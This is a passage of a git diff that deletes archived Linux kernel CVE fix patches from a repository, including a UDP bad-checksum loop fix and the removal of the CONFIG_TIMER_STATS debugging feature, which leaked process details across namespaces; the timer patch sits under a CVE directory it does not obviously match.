-+		tree = ERR_PTR(-EINVAL);
-+	else
-+		tree = copy_tree(real_mount(path->mnt), path->dentry,
-+				 CL_COPY_ALL | CL_PRIVATE);
- 	namespace_unlock();
- 	if (IS_ERR(tree))
- 		return ERR_CAST(tree);
diff --git a/Patches/Linux_CVEs/CVE-2015-5364/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-5364/ANY/0001.patch
deleted file mode 100644
index 58c295cc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5364/ANY/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From beb39db59d14990e401e235faf66a6b9b31240b0 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Sat, 30 May 2015 09:16:53 -0700
-Subject: udp: fix behavior of wrong checksums
-
-We have two problems in UDP stack related to bogus checksums :
-
-1) We return -EAGAIN to application even if receive queue is not empty.
-   This breaks applications using edge trigger epoll()
-
-2) Under UDP flood, we can loop forever without yielding to other
-   processes, potentially hanging the host, especially on non SMP.
-
-This patch is an attempt to make things better.
-
-We might in the future add extra support for rt applications
-wanting to better control time spent doing a recv() in a hostile
-environment. For example we could validate checksums before queuing
-packets in socket receive queue.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Cc: Willem de Bruijn <willemb@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/udp.c | 6 ++----
- net/ipv6/udp.c | 6 ++----
- 2 files changed, 4 insertions(+), 8 deletions(-)
-
-diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
-index d10b7e0..1c92ea6 100644
---- a/net/ipv4/udp.c
-+++ b/net/ipv4/udp.c
-@@ -1345,10 +1345,8 @@ csum_copy_err:
- 	}
- 	unlock_sock_fast(sk, slow);
- 
--	if (noblock)
--		return -EAGAIN;
--
--	/* starting over for a new packet */
-+	/* starting over for a new packet, but check if we need to yield */
-+	cond_resched();
- 	msg->msg_flags &= ~MSG_TRUNC;
- 	goto try_again;
- }
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index c2ec416..e51fc3e 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -525,10 +525,8 @@ csum_copy_err:
- 	}
- 	unlock_sock_fast(sk, slow);
- 
--	if (noblock)
--		return -EAGAIN;
--
--	/* starting over for a new packet */
-+	/* starting over for a new packet, but check if we need to yield */
-+	cond_resched();
- 	msg->msg_flags &= ~MSG_TRUNC;
- 	goto try_again;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch
deleted file mode 100644
index 596f8405..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch
+++ /dev/null
@@ -1,908 +0,0 @@
-From 0407c7a2f4734cd55902753d788fdbdc32ed7fd9 Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Wed, 08 Feb 2017 11:26:59 -0800
-Subject: [PATCH] time: Remove CONFIG_TIMER_STATS
-
-Currently CONFIG_TIMER_STATS exposes process information across namespaces:
-
-kernel/time/timer_list.c print_timer():
-
-        SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
-
-/proc/timer_list:
-
- #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
-
-Given that the tracer can give the same information, this patch entirely
-removes CONFIG_TIMER_STATS.
-
-Change-Id: Ice26d74094d3ad563808342c1604ad444234844b
-Suggested-by: Thomas Gleixner <tglx@linutronix.de>
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Acked-by: John Stultz <john.stultz@linaro.org>
-Cc: Nicolas Pitre <nicolas.pitre@linaro.org>
-Cc: linux-doc@vger.kernel.org
-Cc: Lai Jiangshan <jiangshanlai@gmail.com>
-Cc: Shuah Khan <shuah@kernel.org>
-Cc: Xing Gao <xgao01@email.wm.edu>
-Cc: Jonathan Corbet <corbet@lwn.net>
-Cc: Jessica Frazelle <me@jessfraz.com>
-Cc: kernel-hardening@lists.openwall.com
-Cc: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
-Cc: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
-Cc: Petr Mladek <pmladek@suse.com>
-Cc: Richard Cochran <richardcochran@gmail.com>
-Cc: Tejun Heo <tj@kernel.org>
-Cc: Michal Marek <mmarek@suse.com>
-Cc: Josh Poimboeuf <jpoimboe@redhat.com>
-Cc: Dmitry Vyukov <dvyukov@google.com>
-Cc: Oleg Nesterov <oleg@redhat.com>
-Cc: "Eric W. Biederman" <ebiederm@xmission.com>
-Cc: Olof Johansson <olof@lixom.net>
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: linux-api@vger.kernel.org
-Cc: Arjan van de Ven <arjan@linux.intel.com>
-Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
----
-
-diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt
-deleted file mode 100644
-index 8abd40b..0000000
---- a/Documentation/timers/timer_stats.txt
-+++ /dev/null
-@@ -1,73 +0,0 @@
--timer_stats - timer usage statistics
--------------------------------------
--
--timer_stats is a debugging facility to make the timer (ab)usage in a Linux
--system visible to kernel and userspace developers. If enabled in the config
--but not used it has almost zero runtime overhead, and a relatively small
--data structure overhead. Even if collection is enabled runtime all the
--locking is per-CPU and lookup is hashed.
--
--timer_stats should be used by kernel and userspace developers to verify that
--their code does not make unduly use of timers. This helps to avoid unnecessary
--wakeups, which should be avoided to optimize power consumption.
--
--It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration
--section.
--
--timer_stats collects information about the timer events which are fired in a
--Linux system over a sample period:
--
--- the pid of the task(process) which initialized the timer
--- the name of the process which initialized the timer
--- the function where the timer was initialized
--- the callback function which is associated to the timer
--- the number of events (callbacks)
--
--timer_stats adds an entry to /proc: /proc/timer_stats
--
--This entry is used to control the statistics functionality and to read out the
--sampled information.
--
--The timer_stats functionality is inactive on bootup.
--
--To activate a sample period issue:
--# echo 1 >/proc/timer_stats
--
--To stop a sample period issue:
--# echo 0 >/proc/timer_stats
--
--The statistics can be retrieved by:
--# cat /proc/timer_stats
--
--The readout of /proc/timer_stats automatically disables sampling. The sampled
--information is kept until a new sample period is started. This allows multiple
--readouts.
--
--Sample output of /proc/timer_stats:
--
--Timerstats sample period: 3.888770 s
--  12,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  15,     1 swapper          hcd_submit_urb (rh_timer_func)
--   4,   959 kedac            schedule_timeout (process_timeout)
--   1,     0 swapper          page_writeback_init (wb_timer_fn)
--  28,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  22,  2948 IRQ 4            tty_flip_buffer_push (delayed_work_timer_fn)
--   3,  3100 bash             schedule_timeout (process_timeout)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          neigh_table_init_no_netlink (neigh_periodic_timer)
--   1,  2292 ip               __netdev_watchdog_up (dev_watchdog)
--   1,    23 events/1         do_cache_clean (delayed_work_timer_fn)
--90 total events, 30.0 events/sec
--
--The first column is the number of events, the second column the pid, the third
--column is the name of the process. The forth column shows the function which
--initialized the timer and in parenthesis the callback function which was
--executed on expiry.
--
--    Thomas, Ingo
--
--Added flag to indicate 'deferrable timer' in /proc/timer_stats. A deferrable
--timer will appear as follows
--  10D,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--
-diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
-index 0302bbe..765d9e7 100644
---- a/include/linux/hrtimer.h
-+++ b/include/linux/hrtimer.h
-@@ -96,12 +96,6 @@
-  * @function:	timer expiry callback function
-  * @base:	pointer to the timer base (per cpu and per clock)
-  * @state:	state information (See bit values above)
-- * @start_site:	timer statistics field to store the site where the timer
-- *		was started
-- * @start_comm: timer statistics field to store the name of the process which
-- *		started the timer
-- * @start_pid: timer statistics field to store the pid of the task which
-- *		started the timer
-  *
-  * The hrtimer structure must be initialized by hrtimer_init()
-  */
-@@ -111,11 +105,6 @@
- 	enum hrtimer_restart		(*function)(struct hrtimer *);
- 	struct hrtimer_clock_base	*base;
- 	unsigned long			state;
--#ifdef CONFIG_TIMER_STATS
--	int				start_pid;
--	void				*start_site;
--	char				start_comm[16];
--#endif
- };
- 
- /**
-diff --git a/include/linux/timer.h b/include/linux/timer.h
-index 8c5a197..7c8adfa 100644
---- a/include/linux/timer.h
-+++ b/include/linux/timer.h
-@@ -23,11 +23,6 @@
- 
- 	int slack;
- 
--#ifdef CONFIG_TIMER_STATS
--	int start_pid;
--	void *start_site;
--	char start_comm[16];
--#endif
- #ifdef CONFIG_LOCKDEP
- 	struct lockdep_map lockdep_map;
- #endif
-@@ -193,49 +188,6 @@
-  * jiffie.
-  */
- extern unsigned long get_next_timer_interrupt(unsigned long now);
--
--/*
-- * Timer-statistics info:
-- */
--#ifdef CONFIG_TIMER_STATS
--
--extern int timer_stats_active;
--
--#define TIMER_STATS_FLAG_DEFERRABLE	0x1
--
--extern void init_timer_stats(void);
--
--extern void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--				     void *timerf, char *comm,
--				     unsigned int timer_flag);
--
--extern void __timer_stats_timer_set_start_info(struct timer_list *timer,
--					       void *addr);
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--	if (likely(!timer_stats_active))
--		return;
--	__timer_stats_timer_set_start_info(timer, __builtin_return_address(0));
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--	timer->start_site = NULL;
--}
--#else
--static inline void init_timer_stats(void)
--{
--}
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--}
--#endif
- 
- extern void add_timer(struct timer_list *timer);
- 
-diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c
-index 47067de..c9c3a6c 100644
---- a/kernel/hrtimer.c
-+++ b/kernel/hrtimer.c
-@@ -827,34 +827,6 @@
- 	clock_was_set_delayed();
- }
- 
--static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (timer->start_site)
--		return;
--	timer->start_site = __builtin_return_address(0);
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--#endif
--}
--
--static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--#endif
--}
--
--static inline void timer_stats_account_hrtimer(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (likely(!timer_stats_active))
--		return;
--	timer_stats_update_stats(timer, timer->start_pid, timer->start_site,
--				 timer->function, timer->start_comm, 0);
--#endif
--}
--
- /*
-  * Counterpart to lock_hrtimer_base above:
-  */
-@@ -988,7 +960,6 @@
- 		 * rare case and less expensive than a smp call.
- 		 */
- 		debug_deactivate(timer);
--		timer_stats_hrtimer_clear_start_info(timer);
- 		reprogram = base->cpu_base == &__get_cpu_var(hrtimer_bases);
- 		/*
- 		 * We must preserve the CALLBACK state flag here,
-@@ -1033,8 +1004,6 @@
- 
- 	/* Switch the timer base, if necessary: */
- 	new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED);
--
--	timer_stats_hrtimer_set_start_info(timer);
- 
- 	leftmost = enqueue_hrtimer(timer, new_base);
- 
-@@ -1211,12 +1180,6 @@
- 	base = hrtimer_clockid_to_base(clock_id);
- 	timer->base = &cpu_base->clock_base[base];
- 	timerqueue_init(&timer->node);
--
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- }
- 
- /**
-@@ -1264,7 +1227,6 @@
- 
- 	debug_deactivate(timer);
- 	__remove_hrtimer(timer, base, HRTIMER_STATE_CALLBACK, 0);
--	timer_stats_account_hrtimer(timer);
- 	fn = timer->function;
- 
- 	/*
-diff --git a/kernel/time/Makefile b/kernel/time/Makefile
-index aa91af5..fd87e51 100644
---- a/kernel/time/Makefile
-+++ b/kernel/time/Makefile
-@@ -7,4 +7,3 @@
- obj-$(CONFIG_GENERIC_SCHED_CLOCK)		+= sched_clock.o
- obj-$(CONFIG_TICK_ONESHOT)			+= tick-oneshot.o
- obj-$(CONFIG_TICK_ONESHOT)			+= tick-sched.o
--obj-$(CONFIG_TIMER_STATS)			+= timer_stats.o
-diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c
-index 61ed862..f6a1043 100644
---- a/kernel/time/timer_list.c
-+++ b/kernel/time/timer_list.c
-@@ -57,21 +57,11 @@
- print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer,
- 	    int idx, u64 now)
- {
--#ifdef CONFIG_TIMER_STATS
--	char tmp[TASK_COMM_LEN + 1];
--#endif
- 	SEQ_printf(m, " #%d: ", idx);
- 	print_name_offset(m, taddr);
- 	SEQ_printf(m, ", ");
- 	print_name_offset(m, timer->function);
- 	SEQ_printf(m, ", S:%02lx", timer->state);
--#ifdef CONFIG_TIMER_STATS
--	SEQ_printf(m, ", ");
--	print_name_offset(m, timer->start_site);
--	memcpy(tmp, timer->start_comm, TASK_COMM_LEN);
--	tmp[TASK_COMM_LEN] = 0;
--	SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
--#endif
- 	SEQ_printf(m, "\n");
- 	SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n",
- 		(unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)),
-diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c
-deleted file mode 100644
-index 0b537f2..0000000
---- a/kernel/time/timer_stats.c
-+++ /dev/null
-@@ -1,425 +0,0 @@
--/*
-- * kernel/time/timer_stats.c
-- *
-- * Collect timer usage statistics.
-- *
-- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar
-- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner <tglx@timesys.com>
-- *
-- * timer_stats is based on timer_top, a similar functionality which was part of
-- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the
-- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based
-- * on dynamic allocation of the statistics entries and linear search based
-- * lookup combined with a global lock, rather than the static array, hash
-- * and per-CPU locking which is used by timer_stats. It was written for the
-- * pre hrtimer kernel code and therefore did not take hrtimers into account.
-- * Nevertheless it provided the base for the timer_stats implementation and
-- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks
-- * for this effort.
-- *
-- * timer_top.c is
-- *	Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus
-- *	Written by Daniel Petrini <d.pensator@gmail.com>
-- *	timer_top.c was released under the GNU General Public License version 2
-- *
-- * We export the addresses and counting of timer functions being called,
-- * the pid and cmdline from the owner process if applicable.
-- *
-- * Start/stop data collection:
-- * # echo [1|0] >/proc/timer_stats
-- *
-- * Display the information collected so far:
-- * # cat /proc/timer_stats
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 as
-- * published by the Free Software Foundation.
-- */
--
--#include <linux/proc_fs.h>
--#include <linux/module.h>
--#include <linux/spinlock.h>
--#include <linux/sched.h>
--#include <linux/seq_file.h>
--#include <linux/kallsyms.h>
--
--#include <asm/uaccess.h>
--
--/*
-- * This is our basic unit of interest: a timer expiry event identified
-- * by the timer, its start/expire functions and the PID of the task that
-- * started the timer. We count the number of times an event happens:
-- */
--struct entry {
--	/*
--	 * Hash list:
--	 */
--	struct entry		*next;
--
--	/*
--	 * Hash keys:
--	 */
--	void			*timer;
--	void			*start_func;
--	void			*expire_func;
--	pid_t			pid;
--
--	/*
--	 * Number of timeout events:
--	 */
--	unsigned long		count;
--	unsigned int		timer_flag;
--
--	/*
--	 * We save the command-line string to preserve
--	 * this information past task exit:
--	 */
--	char			comm[TASK_COMM_LEN + 1];
--
--} ____cacheline_aligned_in_smp;
--
--/*
-- * Spinlock protecting the tables - not taken during lookup:
-- */
--static DEFINE_RAW_SPINLOCK(table_lock);
--
--/*
-- * Per-CPU lookup locks for fast hash lookup:
-- */
--static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock);
--
--/*
-- * Mutex to serialize state changes with show-stats activities:
-- */
--static DEFINE_MUTEX(show_mutex);
--
--/*
-- * Collection status, active/inactive:
-- */
--int __read_mostly timer_stats_active;
--
--/*
-- * Beginning/end timestamps of measurement:
-- */
--static ktime_t time_start, time_stop;
--
--/*
-- * tstat entry structs only get allocated while collection is
-- * active and never freed during that time - this simplifies
-- * things quite a bit.
-- *
-- * They get freed when a new collection period is started.
-- */
--#define MAX_ENTRIES_BITS	10
--#define MAX_ENTRIES		(1UL << MAX_ENTRIES_BITS)
--
--static unsigned long nr_entries;
--static struct entry entries[MAX_ENTRIES];
--
--static atomic_t overflow_count;
--
--/*
-- * The entries are in a hash-table, for fast lookup:
-- */
--#define TSTAT_HASH_BITS		(MAX_ENTRIES_BITS - 1)
--#define TSTAT_HASH_SIZE		(1UL << TSTAT_HASH_BITS)
--#define TSTAT_HASH_MASK		(TSTAT_HASH_SIZE - 1)
--
--#define __tstat_hashfn(entry)						\
--	(((unsigned long)(entry)->timer       ^				\
--	  (unsigned long)(entry)->start_func  ^				\
--	  (unsigned long)(entry)->expire_func ^				\
--	  (unsigned long)(entry)->pid		) & TSTAT_HASH_MASK)
--
--#define tstat_hashentry(entry)	(tstat_hash_table + __tstat_hashfn(entry))
--
--static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly;
--
--static void reset_entries(void)
--{
--	nr_entries = 0;
--	memset(entries, 0, sizeof(entries));
--	memset(tstat_hash_table, 0, sizeof(tstat_hash_table));
--	atomic_set(&overflow_count, 0);
--}
--
--static struct entry *alloc_entry(void)
--{
--	if (nr_entries >= MAX_ENTRIES)
--		return NULL;
--
--	return entries + nr_entries++;
--}
--
--static int match_entries(struct entry *entry1, struct entry *entry2)
--{
--	return entry1->timer       == entry2->timer	  &&
--	       entry1->start_func  == entry2->start_func  &&
--	       entry1->expire_func == entry2->expire_func &&
--	       entry1->pid	   == entry2->pid;
--}
--
--/*
-- * Look up whether an entry matching this item is present
-- * in the hash already. Must be called with irqs off and the
-- * lookup lock held:
-- */
--static struct entry *tstat_lookup(struct entry *entry, char *comm)
--{
--	struct entry **head, *curr, *prev;
--
--	head = tstat_hashentry(entry);
--	curr = *head;
--
--	/*
--	 * The fastpath is when the entry is already hashed,
--	 * we do this with the lookup lock held, but with the
--	 * table lock not held:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			return curr;
--
--		curr = curr->next;
--	}
--	/*
--	 * Slowpath: allocate, set up and link a new hash entry:
--	 */
--	prev = NULL;
--	curr = *head;
--
--	raw_spin_lock(&table_lock);
--	/*
--	 * Make sure we have not raced with another CPU:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			goto out_unlock;
--
--		prev = curr;
--		curr = curr->next;
--	}
--
--	curr = alloc_entry();
--	if (curr) {
--		*curr = *entry;
--		curr->count = 0;
--		curr->next = NULL;
--		memcpy(curr->comm, comm, TASK_COMM_LEN);
--
--		smp_mb(); /* Ensure that curr is initialized before insert */
--
--		if (prev)
--			prev->next = curr;
--		else
--			*head = curr;
--	}
-- out_unlock:
--	raw_spin_unlock(&table_lock);
--
--	return curr;
--}
--
--/**
-- * timer_stats_update_stats - Update the statistics for a timer.
-- * @timer:	pointer to either a timer_list or a hrtimer
-- * @pid:	the pid of the task which set up the timer
-- * @startf:	pointer to the function which did the timer setup
-- * @timerf:	pointer to the timer callback function of the timer
-- * @comm:	name of the process which set up the timer
-- *
-- * When the timer is already registered, then the event counter is
-- * incremented. Otherwise the timer is registered in a free slot.
-- */
--void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--			      void *timerf, char *comm,
--			      unsigned int timer_flag)
--{
--	/*
--	 * It doesn't matter which lock we take:
--	 */
--	raw_spinlock_t *lock;
--	struct entry *entry, input;
--	unsigned long flags;
--
--	if (likely(!timer_stats_active))
--		return;
--
--	lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id());
--
--	input.timer = timer;
--	input.start_func = startf;
--	input.expire_func = timerf;
--	input.pid = pid;
--	input.timer_flag = timer_flag;
--
--	raw_spin_lock_irqsave(lock, flags);
--	if (!timer_stats_active)
--		goto out_unlock;
--
--	entry = tstat_lookup(&input, comm);
--	if (likely(entry))
--		entry->count++;
--	else
--		atomic_inc(&overflow_count);
--
-- out_unlock:
--	raw_spin_unlock_irqrestore(lock, flags);
--}
--
--static void print_name_offset(struct seq_file *m, unsigned long addr)
--{
--	char symname[KSYM_NAME_LEN];
--
--	if (lookup_symbol_name(addr, symname) < 0)
--		seq_printf(m, "<%p>", (void *)addr);
--	else
--		seq_printf(m, "%s", symname);
--}
--
--static int tstats_show(struct seq_file *m, void *v)
--{
--	struct timespec period;
--	struct entry *entry;
--	unsigned long ms;
--	long events = 0;
--	ktime_t time;
--	int i;
--
--	mutex_lock(&show_mutex);
--	/*
--	 * If still active then calculate up to now:
--	 */
--	if (timer_stats_active)
--		time_stop = ktime_get();
--
--	time = ktime_sub(time_stop, time_start);
--
--	period = ktime_to_timespec(time);
--	ms = period.tv_nsec / 1000000;
--
--	seq_puts(m, "Timer Stats Version: v0.2\n");
--	seq_printf(m, "Sample period: %ld.%03ld s\n", period.tv_sec, ms);
--	if (atomic_read(&overflow_count))
--		seq_printf(m, "Overflow: %d entries\n",
--			atomic_read(&overflow_count));
--
--	for (i = 0; i < nr_entries; i++) {
--		entry = entries + i;
-- 		if (entry->timer_flag & TIMER_STATS_FLAG_DEFERRABLE) {
--			seq_printf(m, "%4luD, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		} else {
--			seq_printf(m, " %4lu, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		}
--
--		print_name_offset(m, (unsigned long)entry->start_func);
--		seq_puts(m, " (");
--		print_name_offset(m, (unsigned long)entry->expire_func);
--		seq_puts(m, ")\n");
--
--		events += entry->count;
--	}
--
--	ms += period.tv_sec * 1000;
--	if (!ms)
--		ms = 1;
--
--	if (events && period.tv_sec)
--		seq_printf(m, "%ld total events, %ld.%03ld events/sec\n",
--			   events, events * 1000 / ms,
--			   (events * 1000000 / ms) % 1000);
--	else
--		seq_printf(m, "%ld total events\n", events);
--
--	mutex_unlock(&show_mutex);
--
--	return 0;
--}
--
--/*
-- * After a state change, make sure all concurrent lookup/update
-- * activities have stopped:
-- */
--static void sync_access(void)
--{
--	unsigned long flags;
--	int cpu;
--
--	for_each_online_cpu(cpu) {
--		raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu);
--
--		raw_spin_lock_irqsave(lock, flags);
--		/* nothing */
--		raw_spin_unlock_irqrestore(lock, flags);
--	}
--}
--
--static ssize_t tstats_write(struct file *file, const char __user *buf,
--			    size_t count, loff_t *offs)
--{
--	char ctl[2];
--
--	if (count != 2 || *offs)
--		return -EINVAL;
--
--	if (copy_from_user(ctl, buf, count))
--		return -EFAULT;
--
--	mutex_lock(&show_mutex);
--	switch (ctl[0]) {
--	case '0':
--		if (timer_stats_active) {
--			timer_stats_active = 0;
--			time_stop = ktime_get();
--			sync_access();
--		}
--		break;
--	case '1':
--		if (!timer_stats_active) {
--			reset_entries();
--			time_start = ktime_get();
--			smp_mb();
--			timer_stats_active = 1;
--		}
--		break;
--	default:
--		count = -EINVAL;
--	}
--	mutex_unlock(&show_mutex);
--
--	return count;
--}
--
--static int tstats_open(struct inode *inode, struct file *filp)
--{
--	return single_open(filp, tstats_show, NULL);
--}
--
--static const struct file_operations tstats_fops = {
--	.open		= tstats_open,
--	.read		= seq_read,
--	.write		= tstats_write,
--	.llseek		= seq_lseek,
--	.release	= single_release,
--};
--
--void __init init_timer_stats(void)
--{
--	int cpu;
--
--	for_each_possible_cpu(cpu)
--		raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu));
--}
--
--static int __init init_tstats_procfs(void)
--{
--	struct proc_dir_entry *pe;
--
--	pe = proc_create("timer_stats", 0644, NULL, &tstats_fops);
--	if (!pe)
--		return -ENOMEM;
--	return 0;
--}
--__initcall(init_tstats_procfs);
-diff --git a/kernel/timer.c b/kernel/timer.c
-index 5733076..8bff0a9 100644
---- a/kernel/timer.c
-+++ b/kernel/timer.c
-@@ -397,34 +397,6 @@
- 	}
- }
- 
--#ifdef CONFIG_TIMER_STATS
--void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr)
--{
--	if (timer->start_site)
--		return;
--
--	timer->start_site = addr;
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--}
--
--static void timer_stats_account_timer(struct timer_list *timer)
--{
--	unsigned int flag = 0;
--
--	if (likely(!timer->start_site))
--		return;
--	if (unlikely(tbase_get_deferrable(timer->base)))
--		flag |= TIMER_STATS_FLAG_DEFERRABLE;
--
--	timer_stats_update_stats(timer, timer->start_pid, timer->start_site,
--				 timer->function, timer->start_comm, flag);
--}
--
--#else
--static void timer_stats_account_timer(struct timer_list *timer) {}
--#endif
--
- #ifdef CONFIG_DEBUG_OBJECTS_TIMERS
- 
- static struct debug_obj_descr timer_debug_descr;
-@@ -637,11 +609,6 @@
- 	timer->entry.next = NULL;
- 	timer->base = (void *)((unsigned long)base | flags);
- 	timer->slack = -1;
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- 	lockdep_init_map(&timer->lockdep_map, name, key, 0);
- }
- 
-@@ -739,7 +706,6 @@
- 	unsigned long flags;
- 	int ret = 0 , cpu;
- 
--	timer_stats_timer_set_start_info(timer);
- 	BUG_ON(!timer->function);
- 
- 	base = lock_timer_base(timer, &flags);
-@@ -943,7 +909,6 @@
- 	struct tvec_base *base = per_cpu(tvec_bases, cpu);
- 	unsigned long flags;
- 
--	timer_stats_timer_set_start_info(timer);
- 	BUG_ON(timer_pending(timer) || !timer->function);
- 	spin_lock_irqsave(&base->lock, flags);
- 	timer_set_base(timer, base);
-@@ -981,7 +946,6 @@
- 
- 	debug_assert_init(timer);
- 
--	timer_stats_timer_clear_start_info(timer);
- 	if (timer_pending(timer)) {
- 		base = lock_timer_base(timer, &flags);
- 		ret = detach_if_pending(timer, base, true);
-@@ -1009,10 +973,9 @@
- 
- 	base = lock_timer_base(timer, &flags);
- 
--	if (base->running_timer != timer) {
--		timer_stats_timer_clear_start_info(timer);
-+	if (base->running_timer != timer)
- 		ret = detach_if_pending(timer, base, true);
--	}
-+
- 	spin_unlock_irqrestore(&base->lock, flags);
- 
- 	return ret;
-@@ -1192,8 +1155,6 @@
- 			fn = timer->function;
- 			data = timer->data;
- 			irqsafe = tbase_get_irqsafe(timer->base);
--
--			timer_stats_account_timer(timer);
- 
- 			base->running_timer = timer;
- 			detach_expired_timer(timer, base);
-@@ -1695,7 +1656,6 @@
- 
- 	err = timer_cpu_notify(&timers_nb, (unsigned long)CPU_UP_PREPARE,
- 			       (void *)(long)smp_processor_id());
--	init_timer_stats();
- 
- 	BUG_ON(err != NOTIFY_OK);
- 
-diff --git a/kernel/workqueue.c b/kernel/workqueue.c
-index 2505648..562f1a5 100755
---- a/kernel/workqueue.c
-+++ b/kernel/workqueue.c
-@@ -1448,8 +1448,6 @@
- 		return;
- 	}
- 
--	timer_stats_timer_set_start_info(&dwork->timer);
--
- 	dwork->wq = wq;
- 	dwork->cpu = cpu;
- 	timer->expires = jiffies + delay;
-diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
-index a0818f1..822e2be 100755
---- a/lib/Kconfig.debug
-+++ b/lib/Kconfig.debug
-@@ -400,20 +400,6 @@
- 	  application, you can say N to avoid the very slight overhead
- 	  this adds.
- 
--config TIMER_STATS
--	bool "Collect kernel timers statistics"
--	depends on DEBUG_KERNEL && PROC_FS
--	help
--	  If you say Y here, additional code will be inserted into the
--	  timer routines to collect statistics about kernel timers being
--	  reprogrammed. The statistics can be read from /proc/timer_stats.
--	  The statistics collection is started by writing 1 to /proc/timer_stats,
--	  writing 0 stops it. This feature is useful to collect information
--	  about timer usage patterns in kernel and userspace. This feature
--	  is lightweight if enabled in the kernel config but not activated
--	  (it defaults to deactivated on bootup and will only be activated
--	  if some application like powertop activates it explicitly).
--
- config DEBUG_OBJECTS
- 	bool "Debug object operations"
- 	depends on DEBUG_KERNEL
diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch.base64
deleted file mode 100644
index 1883365e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
